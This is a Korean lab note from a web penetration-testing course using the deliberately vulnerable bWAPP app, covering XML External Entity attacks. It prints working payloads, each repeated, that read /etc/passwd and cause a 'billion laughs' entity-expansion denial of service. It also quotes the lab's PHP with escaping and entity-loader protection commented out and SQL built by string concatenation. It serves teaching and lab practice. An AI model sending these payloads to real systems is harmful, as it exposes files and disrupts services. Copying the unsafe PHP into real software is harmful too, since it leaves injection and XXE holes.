출처
인프런, 비박스를 활용한 웹 모의해킹 완벽 실습 22강 https://www.inflearn.com/course/%EB%B9%84%EB%B0%95%EC%8A%A4-%EB%AA%A8%EC%9D%98%ED%95%B4%ED%82%B9-%EC%8B%A4%EC%8A%B5/
XML 외부 엔티티 공격
- Input –> Process –> Output의 각 과정의 취약점을 이용
XML External Entity Attacks (XXE)
삽입할 XML 코드
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "file:///etc/passwd"> ]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
##############################################################
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT login (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<reset><login>&lol9;</login><secret>blah</secret></reset>
Any Bugs?를 누르고 BurpSuite Repeater 실행 후 XML 코드 삽입
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [
<!ENTITY bWAPP SYSTEM "file:///etc/passwd"> ]>
<reset><login>&bWAPP;</login><secret>blah</secret></reset>
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT login (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<reset><login>&lol9;</login><secret>blah</secret></reset>
- 서버 응답이 굉장히 오래 걸림
서버 응답이 느린 이유
- lol1 ~ lol9까지 ENTITY를 생성하다가 마지막
<reset><login>&lol9;</login><secret>blah</secret></reset>
에서 문제 발생 - 각 ENTITY에서 상위 lol을 호출하여서 DoS 공격을 발생시킴 –> 번 호출
XXE-2.php에서 방어하는 부분
$login = $xml->login;
$secret = $xml->secret;
if($login && $login != "" && $secret)
{
// $login = mysqli_real_escape_string($link, $login);
// $secret = mysqli_real_escape_string($link, $secret);
$sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";
// Debugging
// echo $sql;
$recordset = $link->query($sql);
if(!$recordset)
{
die("Connect Error: " . $link->error);
}
$message = $login . "'s secret has been reset!";
}
else
{
// Disables XML external entities. Doesn't work with older PHP versions!
// libxml_disable_entity_loader(true);
$xml = simplexml_load_string($body);
// Debugging
// print_r($xml);
$login = $_SESSION["login"];
$secret = $xml->secret;
세션이 그냥 로그인을 가지고 오고 있고 로그인을 가져오기 때문에 시크릿에 대입할 수 없어서 출력 값을 조정할 수 없다. 하지만 내부적으로 다른 동작을 할 수 있다. 따라서 완벽한 방어책은 아니다. 어쨋든
$login = $xml->login;
에서$login = $_SESSION["login"];
으로 어느정도 방어는 한다. 아무튼 XSS처럼 XML 태그를 사용하지 못하게 할만큼 안전한 방법은 아니다.
Comments